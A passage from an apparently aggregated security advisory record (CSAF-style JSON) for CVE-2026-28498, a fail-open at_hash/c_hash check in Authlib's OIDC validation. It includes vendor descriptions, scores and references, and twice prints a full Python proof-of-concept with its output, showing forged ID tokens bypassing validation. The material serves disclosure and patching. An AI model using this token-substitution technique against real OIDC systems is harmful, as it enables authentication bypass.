_verify_hash_patched() retorno False (fail-closed correcto)\n\n────────────────────────────────────────────────────────────────\nTEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [OK]      Caso A (legitimo, RS256):  at_hash=gh_beqqliVkRPAXdOz2Gbw  ->  aceptado\n  [BYPASS]  Caso B (atacante, 
alg=CUSTOM_ALG):  at_hash=FAAAAAAAAAAAAAAAAAAAA  ->  BYPASS exitoso\n            access_token del atacante aceptado: ya29.MALICIOUS_token_under_attacker_control\n\n────────────────────────────────────────────────────────────────\nTEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [BYPASS]  c_hash='ZZZZZZZZZZZZZZZZZZZZZZ' aceptado con alg=XX9999 -> Authorization Code Substitution posible\n            code del atacante aceptado: ATTACKER_FORGED_AUTH_CODE\n\n────────────────────────────────────────────────────────────────\nTEST 4 - Superficie de Ataque\n────────────────────────────────────────────────────────────────\n  alg                     half_hash   resultado\n  ----------------------  ----------  --------------------\n  'CUSTOM_ALG'            None        BYPASS\n  'XX9999'                None        BYPASS\n  'none'                  None        BYPASS\n  'None'                  None        BYPASS\n  ''                      None        BYPASS\n  'RS'                    None        BYPASS\n  'SHA256'                None        BYPASS\n  'HS0'                   None        BYPASS\n  'EdDSA256'              None        BYPASS\n  'PS999'                 None        BYPASS\n  'RS 256'                None        BYPASS\n  '../../../etc'          None        BYPASS\n  \"' OR '1'='1\"           None        BYPASS\n\nFix: `if not hash_value` -> `if hash_value is None` en _verify_hash()\n```",
                    "title": "github - https://github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-28498"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.\nThis IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-28498"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-28498"
                },
                {
                    "category": "description",
                    "text": "## 1. Executive Summary\n\nA critical library-level vulnerability was identified in the **Authlib** Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (`_verify_hash`) responsible for validating the `at_hash` (Access Token Hash) and `c_hash` (Authorization Code Hash) claims exhibits a **fail-open** behavior when encountering an unsupported or unknown cryptographic algorithm. \n\nThis flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized `alg` header parameter. The library intercepts the unsupported state and silently returns `True` (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications.\n\n---\n\n## 2. Technical Details & Root Cause\n\nThe vulnerability resides within the `_verify_hash(signature, s, alg)` function in `authlib/oidc/core/claims.py`:\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if not hash_value:        # ← VULNERABILITY: create_half_hash returns None for unknown algorithms\n        return True            # ← BYPASS: The verification silently passes\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\nWhen an unsupported algorithm string (e.g., `\"XX999\"`) is processed by the helper function `create_half_hash` in `authlib/oidc/core/util.py`, the internal `getattr(hashlib, hash_type, None)` call fails, and the function correctly returns `None`. \n\nHowever, instead of triggering a `Fail-Closed` cryptographic state (raising an exception or returning `False`), the `_verify_hash` function misinterprets the `None` return value and explicitly returns `True`. 
\n\nBecause developers rely on the standard `.validate()` method provided by Authlib's `IDToken` class—which internally calls this flawed function—there is **no mechanism for the implementing developer to prevent this bypass**. It is a strict library-level liability.\n\n---\n\n## 3. Attack Scenario\n\nThis vulnerability exposes applications utilizing Hybrid or Implicit OIDC flows to **Token Substitution Attacks**.\n\n1. An attacker initiates an OIDC flow and receives a legitimately signed ID Token, but wishes to substitute the bound Access Token (`access_token`) or Authorization Code (`code`) with a malicious or mismatched one.\n2. The attacker re-crafts the JWT header of the ID Token, setting the `alg` parameter to an arbitrary, unsupported value (e.g., `{\"alg\": \"CUSTOM_ALG\"}`).\n3. The server uses Authlib to validate the incoming token. The JWT signature validation might pass (or be previously cached/bypassed depending on state), progressing to the claims validation phase.\n4. Authlib attempts to validate the `at_hash` or `c_hash` claims. \n5. Because `\"CUSTOM_ALG\"` is unsupported by `hashlib`, `create_half_hash` returns `None`.\n6. Authlib's `_verify_hash` receives `None` and silently returns `True`.\n7. **Result:** The application accepts the substituted/malicious Access Token or Authorization Code without any cryptographic verification of the binding hash.\n\n---\n\n## 4. Specification & Standards Violations\n\nThis explicit fail-open behavior violates multiple foundational RFCs and Core Specifications. 
A secure cryptographic library **MUST** fail and reject material when encountering unsupported cryptographic parameters.\n\n**OpenID Connect Core 1.0**\n* **§ 3.2.2.9 (Access Token Validation):** \"If the ID Token contains an `at_hash` Claim, the Client MUST verify that the hash value of the Access Token matches the value of the `at_hash` Claim.\" Silencing the validation check natively contradicts this absolute requirement.\n* **§ 3.3.2.11 (Authorization Code Validation):** Identically mandates the verification of the `c_hash` Claim.\n\n**IETF JSON Web Token (JWT) Best Current Practices (BCP)**\n* **RFC 8725 § 3.1.1:** \"Libraries MUST NOT trust the signature without verifying it according to the algorithm... if validation fails, the token MUST be rejected.\" Authlib's implementation effectively \"trusts\" the hash when it cannot verify the algorithm.\n\n**IETF JSON Web Signature (JWS)**\n* **RFC 7515 § 5.2 (JWS Validation):** Cryptographic validations must reject the payload if the specified parameters are unsupported. By returning `True` for an `UnsupportedAlgorithm` state, Authlib violates robust application security logic.\n\n---\n\n## 5. Remediation Recommendation\n\nThe `_verify_hash` function must be patched to enforce a `Fail-Closed` posture. If an algorithm is unsupported and cannot produce a hash for comparison, the validation **must** fail immediately.\n\n**Suggested Patch (`authlib/oidc/core/claims.py`):**\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        # FAIL-CLOSED: The algorithm is unsupported, reject the token.\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\n---\n\n## 6. Proof of Concept (PoC)\n\nThe following standalone script mathematically demonstrates the vulnerability across the Root Cause, Implicit Flow (`at_hash`), Hybrid Flow (`c_hash`), and the entire attack surface. 
It utilizes Authlib's own validation logic to prove the Fail-Open behavior.\n\n```bash\npython3 -m venv venv\nsource venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib; print(authlib.__version__)\"\n# → 1.6.8\n```\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title          OIDC at_hash / c_hash Verification Bypass\n@affected       authlib <= 1.6.8\n@file           authlib/oidc/core/claims.py :: _verify_hash()\n@notice         _verify_hash() retorna True cuando create_half_hash() retorna\n                None (alg no soportado), causando Fail-Open en la verificacion\n                de binding entre ID Token y Access Token / Authorization Code.\n@dev            Reproduce el bypass directamente contra el codigo de authlib\n                sin mocks. Todas las llamadas son al modulo real instalado.\n\"\"\"\n\nimport hmac\nimport hashlib\nimport base64\nimport time\n\nimport authlib\nfrom authlib.common.encoding   import to_bytes\nfrom authlib.oidc.core.util    import create_half_hash\nfrom authlib.oidc.core.claims  import IDToken, HybridIDToken\nfrom authlib.oidc.core.claims  import _verify_hash as authlib_verify_hash\n\n# ─── helpers ──────────────────────────────────────────────────────────────────\n\nR   = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n    print(f\"\\n{CYN}{'─' * 64}{R}\")\n    print(f\"{BLD}{title}{R}\")\n    print(f\"{CYN}{'─' * 64}{R}\")\n\ndef ok(msg):   print(f\"  {GRN}[OK]      {R}{msg}\")\ndef fail(msg): print(f\"  {RED}[BYPASS]  {R}{BLD}{msg}{R}\")\ndef info(msg): print(f\"  {DIM}          {msg}{R}\")\n\ndef at_hash_correct(token: str, alg: str) -> str:\n    \"\"\"\n    @notice  Computa at_hash segun OIDC Core 1.0 s3.2.2.9.\n    @param   token  Access token ASCII\n    @param   alg    Algoritmo del header del ID Token\n    @return  str    at_hash en Base64url sin 
padding\n    \"\"\"\n    fn = {\"256\": hashlib.sha256, \"384\": hashlib.sha384, \"512\": hashlib.sha512}\n    digest = fn.get(alg[-3:], hashlib.sha256)(token.encode()).digest()\n    return base64.urlsafe_b64encode(digest[:len(digest)//2]).rstrip(b\"=\").decode()\n\n\ndef _verify_hash_patched(signature: str, s: str, alg: str) -> bool:\n    \"\"\"\n    @notice  Version corregida de _verify_hash() con semantica Fail-Closed.\n    @dev     Fix: `if not hash_value` -> `if hash_value is None`\n             None es falsy en Python, pero b\"\" no lo es. El chequeo original\n             no distingue entre \"algoritmo no soportado\" y \"hash vacio\".\n    \"\"\"\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n\n# ─── test 1: root cause ───────────────────────────────────────────────────────\n\ndef test_root_cause():\n    \"\"\"\n    @notice  Demuestra que create_half_hash() retorna None para alg desconocido\n             y que _verify_hash() interpreta ese None como verificacion exitosa.\n    \"\"\"\n    header(\"TEST 1 - Root Cause: create_half_hash() + _verify_hash()\")\n\n    token    = \"real_access_token_from_AS\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n    alg      = \"CUSTOM_ALG\"\n\n    half_hash = create_half_hash(token, alg)\n    info(f\"create_half_hash(token, {alg!r})  ->  {half_hash!r}  (None = alg no soportado)\")\n\n    result_vuln    = authlib_verify_hash(fake_sig, token, alg)\n    result_patched = _verify_hash_patched(fake_sig, token, alg)\n\n    print()\n    if result_vuln:\n        fail(f\"authlib _verify_hash() retorno True con firma falsa y alg={alg!r}\")\n    else:\n        ok(f\"authlib _verify_hash() retorno False\")\n\n    if not result_patched:\n        ok(f\"_verify_hash_patched() retorno False (fail-closed correcto)\")\n    else:\n        fail(f\"_verify_hash_patched() retorno True\")\n\n# ─── test 2: IDToken.validate_at_hash() 
bypass ────────────────────────────────\n\ndef test_at_hash_bypass():\n    \"\"\"\n    @notice  Demuestra el bypass end-to-end en IDToken.validate_at_hash().\n             El atacante modifica el header alg del JWT a un valor no soportado.\n             validate_at_hash() no levanta excepcion -> token aceptado.\n\n    @dev     Flujo real de authlib:\n               validate_at_hash() -> _verify_hash(at_hash, access_token, alg)\n               -> create_half_hash(access_token, \"CUSTOM_ALG\") -> None\n               -> `if not None` -> True -> no InvalidClaimError -> BYPASS\n    \"\"\"\n    header(\"TEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\")\n\n    real_token  = \"ya29.LEGITIMATE_token_from_real_AS\"\n    evil_token  = \"ya29.MALICIOUS_token_under_attacker_control\"\n    fake_at_hash = \"FAAAAAAAAAAAAAAAAAAAA\"\n\n    # --- caso A: token legitimo con alg correcto ---\n    correct_hash = at_hash_correct(real_token, \"RS256\")\n    token_legit  = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": correct_hash},\n        {\"access_token\": real_token}\n    )\n    token_legit.header = {\"alg\": \"RS256\"}\n\n    try:\n        token_legit.validate_at_hash()\n        ok(f\"Caso A (legitimo, RS256):  at_hash={correct_hash}  ->  aceptado\")\n    except Exception as e:\n        fail(f\"Caso A rechazo el token legitimo: {e}\")\n\n    # --- caso B: token malicioso con alg forjado ---\n    token_forged = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": fake_at_hash},\n        {\"access_token\": evil_token}\n    )\n    token_forged.header = {\"alg\": \"CUSTOM_ALG\"}\n\n    try:\n        token_forged.validate_at_hash()\n        fail(f\"Caso B (atacante, alg=CUSTOM_ALG):  
at_hash={fake_at_hash}  ->  BYPASS exitoso\")\n        info(f\"access_token del atacante aceptado: {evil_token}\")\n    except Exception as e:\n        ok(f\"Caso B rechazado correctamente: {e}\")\n\n# ─── test 3: HybridIDToken.validate_c_hash() bypass ──────────────────────────\n\ndef test_c_hash_bypass():\n    \"\"\"\n    @notice  Mismo bypass pero para c_hash en Hybrid Flow.\n             Permite Authorization Code Substitution Attack.\n    @dev     OIDC Core 1.0 s3.3.2.11 exige verificacion obligatoria de c_hash.\n             Authlib la omite cuando el alg es desconocido.\n    \"\"\"\n    header(\"TEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\")\n\n    real_code  = \"SplxlOBeZQQYbYS6WxSbIA\"\n    evil_code  = \"ATTACKER_FORGED_AUTH_CODE\"\n    fake_chash = \"ZZZZZZZZZZZZZZZZZZZZZZ\"\n\n    token = HybridIDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"nonce\": \"n123\", \"at_hash\": \"AAAA\", \"c_hash\": fake_chash},\n        {\"code\": evil_code, \"access_token\": \"sometoken\"}\n    )\n    token.header = {\"alg\": \"XX9999\"}\n\n    try:\n        token.validate_c_hash()\n        fail(f\"c_hash={fake_chash!r} aceptado con alg=XX9999 -> Authorization Code Substitution posible\")\n        info(f\"code del atacante aceptado: {evil_code}\")\n    except Exception as e:\n        ok(f\"Rechazado correctamente: {e}\")\n\n# ─── test 4: superficie de ataque ─────────────────────────────────────────────\n\ndef test_attack_surface():\n    \"\"\"\n    @notice  Mapea todos los valores de alg que disparan el bypass.\n    @dev     create_half_hash hace: getattr(hashlib, f\"sha{alg[2:]}\", None)\n             Cualquier string que no resuelva a un atributo de hashlib -> None -> bypass.\n    \"\"\"\n    header(\"TEST 4 - Superficie de Ataque\")\n\n    token    = \"test_token\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n\n    vectors 
= [\n        \"CUSTOM_ALG\", \"XX9999\", \"none\", \"None\", \"\", \"RS\", \"SHA256\",\n        \"HS0\", \"EdDSA256\", \"PS999\", \"RS 256\", \"../../../etc\", \"' OR '1'='1\",\n    ]\n\n    print(f\"  {'alg':<22}  {'half_hash':<10}  resultado\")\n    print(f\"  {'-'*22}  {'-'*10}  {'-'*20}\")\n\n    for alg in vectors:\n        hv     = create_half_hash(token, alg)\n        result = authlib_verify_hash(fake_sig, token, alg)\n        hv_str = \"None\" if hv is None else \"bytes\"\n        res_str = f\"{RED}BYPASS{R}\" if result else f\"{GRN}OK{R}\"\n        print(f\"  {alg!r:<22}  {hv_str:<10}  {res_str}\")\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n    print(f\"\\n{BLD}authlib {authlib.__version__} - OIDC Hash Verification Bypass PoC{R}\")\n    print(f\"authlib/oidc/core/claims.py :: _verify_hash() \\n\")\n\n    test_root_cause()\n    test_at_hash_bypass()\n    test_c_hash_bypass()\n    test_attack_surface()\n\n    print(f\"\\n{DIM}Fix: `if not hash_value` -> `if hash_value is None` en _verify_hash(){R}\\n\")\n```\n\n---\n\n## Output\n\n```bash\nauthlib 1.6.8 - OIDC Hash Verification Bypass PoC\nauthlib/oidc/core/claims.py :: _verify_hash() \n\n\n────────────────────────────────────────────────────────────────\nTEST 1 - Root Cause: create_half_hash() + _verify_hash()\n────────────────────────────────────────────────────────────────\n            create_half_hash(token, 'CUSTOM_ALG')  ->  None  (None = alg no soportado)\n\n  [BYPASS]  authlib _verify_hash() retorno True con firma falsa y alg='CUSTOM_ALG'\n  [OK]      _verify_hash_patched() retorno False (fail-closed correcto)\n\n────────────────────────────────────────────────────────────────\nTEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [OK]      Caso A (legitimo, RS256):  at_hash=gh_beqqliVkRPAXdOz2Gbw  ->  aceptado\n  [BYPASS]  Caso B (atacante, 
alg=CUSTOM_ALG):  at_hash=FAAAAAAAAAAAAAAAAAAAA  ->  BYPASS exitoso\n            access_token del atacante aceptado: ya29.MALICIOUS_token_under_attacker_control\n\n────────────────────────────────────────────────────────────────\nTEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [BYPASS]  c_hash='ZZZZZZZZZZZZZZZZZZZZZZ' aceptado con alg=XX9999 -> Authorization Code Substitution posible\n            code del atacante aceptado: ATTACKER_FORGED_AUTH_CODE\n\n────────────────────────────────────────────────────────────────\nTEST 4 - Superficie de Ataque\n────────────────────────────────────────────────────────────────\n  alg                     half_hash   resultado\n  ----------------------  ----------  --------------------\n  'CUSTOM_ALG'            None        BYPASS\n  'XX9999'                None        BYPASS\n  'none'                  None        BYPASS\n  'None'                  None        BYPASS\n  ''                      None        BYPASS\n  'RS'                    None        BYPASS\n  'SHA256'                None        BYPASS\n  'HS0'                   None        BYPASS\n  'EdDSA256'              None        BYPASS\n  'PS999'                 None        BYPASS\n  'RS 256'                None        BYPASS\n  '../../../etc'          None        BYPASS\n  \"' OR '1'='1\"           None        BYPASS\n\nFix: `if not hash_value` -> `if hash_value is None` en _verify_hash()\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "description",
                    "text": "Affected versions of the authlib package are vulnerable to Improper Input Validation due to fail-open cryptographic hash verification for unsupported OIDC signing algorithms. The vulnerability exists in _verify_hash(signature, s, alg) in authlib/oidc/core/claims.py, which calls create_half_hash(s, alg) from authlib/oidc/core/util.py and incorrectly returns True when an unrecognised alg value causes the helper to return None, allowing IDToken.validate() and related OIDC claim validation to accept invalid at_hash or c_hash bindings.",
                    "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) clients and servers. This vulnerability allows a remote attacker to bypass the at_hash and c_hash integrity checks that bind an OIDC ID Token to its access token and authorization code. Specifically, the library's internal hash verification logic (_verify_hash() in authlib/oidc/core/claims.py) fails open when the token's alg value is one the hash helper does not support, so an attacker-supplied access token or authorization code is accepted alongside the ID Token instead of being rejected. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) clients and servers. This vulnerability allows a remote attacker to bypass the at_hash and c_hash integrity checks that bind an OIDC ID Token to its access token and authorization code. Specifically, the library's internal hash verification logic (_verify_hash() in authlib/oidc/core/claims.py) fails open when the token's alg value is one the hash helper does not support, so an attacker-supplied access token or authorization code is accepted alongside the ID Token instead of being rejected. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) clients and servers. This vulnerability allows a remote attacker to bypass the at_hash and c_hash integrity checks that bind an OIDC ID Token to its access token and authorization code. Specifically, the library's internal hash verification logic (_verify_hash() in authlib/oidc/core/claims.py) fails open when the token's alg value is one the hash helper does not support, so an attacker-supplied access token or authorization code is accepted alongside the ID Token instead of being rejected. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6497.json"
                },
                {
                    "category": "other",
                    "text": "0.00012",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.2",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.1",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent CVSS (V3) score, VENDOR FIX as product remediation category, is related to an uncommon CWE ID, there is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, is related to a product by vendor Unknown",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "fixed": [
                    "CSAFPID-5973065",
                    "CSAFPID-5986173"
                ],
                "known_affected": [
                    "CSAFPID-5830119",
                    "CSAFPID-1439279",
                    "CSAFPID-1439313",
                    "CSAFPID-1441200",
                    "CSAFPID-1455906",
                    "CSAFPID-1508257",
                    "CSAFPID-2831634",
                    "CSAFPID-5035448",
                    "CSAFPID-5068100",
                    "CSAFPID-5068103",
                    "CSAFPID-5068105",
                    "CSAFPID-5068108",
                    "CSAFPID-5068110",
                    "CSAFPID-5068114",
                    "CSAFPID-5068116",
                    "CSAFPID-5068119",
                    "CSAFPID-5068121",
                    "CSAFPID-5068123",
                    "CSAFPID-5068126",
                    "CSAFPID-5068128",
                    "CSAFPID-5068131",
                    "CSAFPID-5068134",
                    "CSAFPID-5155537",
                    "CSAFPID-5155538",
                    "CSAFPID-5222639",
                    "CSAFPID-5222767",
                    "CSAFPID-5222780",
                    "CSAFPID-5355695",
                    "CSAFPID-5811359",
                    "CSAFPID-1405217",
                    "CSAFPID-1405218",
                    "CSAFPID-5970752",
                    "CSAFPID-1384077",
                    "CSAFPID-5354794",
                    "CSAFPID-1317174",
                    "CSAFPID-1317175",
                    "CSAFPID-1330296"
                ],
                "known_not_affected": [
                    "CSAFPID-5474797",
                    "CSAFPID-5474798",
                    "CSAFPID-5973066",
                    "CSAFPID-5973067",
                    "CSAFPID-5973068",
                    "CSAFPID-5973069",
                    "CSAFPID-5973070",
                    "CSAFPID-5973071",
                    "CSAFPID-5973072",
                    "CSAFPID-5973073",
                    "CSAFPID-5973074",
                    "CSAFPID-5973075",
                    "CSAFPID-5973076",
                    "CSAFPID-5973077",
                    "CSAFPID-5973078",
                    "CSAFPID-5973079",
                    "CSAFPID-5973080",
                    "CSAFPID-5973081",
                    "CSAFPID-5973082",
                    "CSAFPID-5973083",
                    "CSAFPID-5973084",
                    "CSAFPID-5973085",
                    "CSAFPID-5973086",
                    "CSAFPID-5973087",
                    "CSAFPID-5973088",
                    "CSAFPID-5973089",
                    "CSAFPID-5973090",
                    "CSAFPID-5973091",
                    "CSAFPID-5973092",
                    "CSAFPID-5984227",
                    "CSAFPID-5986174",
                    "CSAFPID-5986175",
                    "CSAFPID-5986176",
                    "CSAFPID-5986177",
                    "CSAFPID-5986178",
                    "CSAFPID-5986179",
                    "CSAFPID-5986180",
                    "CSAFPID-5986181",
                    "CSAFPID-5986182"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28498.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28498.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - pyupio",
                    "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6497.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-m344-f55w-2m6j"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0935"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6308"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6309"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28498"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
